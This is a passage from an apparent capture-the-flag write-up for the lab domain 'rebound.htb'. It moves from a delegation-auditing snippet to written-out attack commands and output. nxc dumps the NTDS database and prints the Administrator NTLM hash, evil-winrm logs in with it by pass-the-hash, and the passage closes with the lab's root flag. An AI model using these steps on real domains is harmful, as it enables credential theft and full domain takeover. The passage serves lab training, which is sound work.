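    "msDS-AllowedToDelegateTo": ["http/dc01.rebound.htb"],
    "msDS-AllowedToActOnBehalfOfOtherIdentity": build_rbcd_sd([LDAP_MONITOR_SID]),
}

if __name__ == "__main__":
    for finding in classify(DELEGATOR):
        print("delegator$:", finding)
```

In a real audit the dictionary comes from an LDAP query of those three attributes; any account whose `Resource-Based Constrained from` list contains a low-privileged user is the kind of change worth alerting on.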

Dumping `ntds.dit` secrets

```bash
(impacket) ┌─[✗]─[kali@parrot]─[/opt/impacket/bin]
└──╼ $nxc smb dc01 -k --use-kcache --ntds --user administrator
SMB         dc01            445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         dc01            445    DC01             [+] rebound.htb\DC01$ from ccache 
SMB         dc01            445    DC01             [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc01            445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc01            445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
```

Access the machine as an administrator

```bash
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
56bf9cc0fa746883f65axxxxxxxxxxxxx
```

> Root Flag: 56bf9cc0fa746883f65ab822f3ceb779
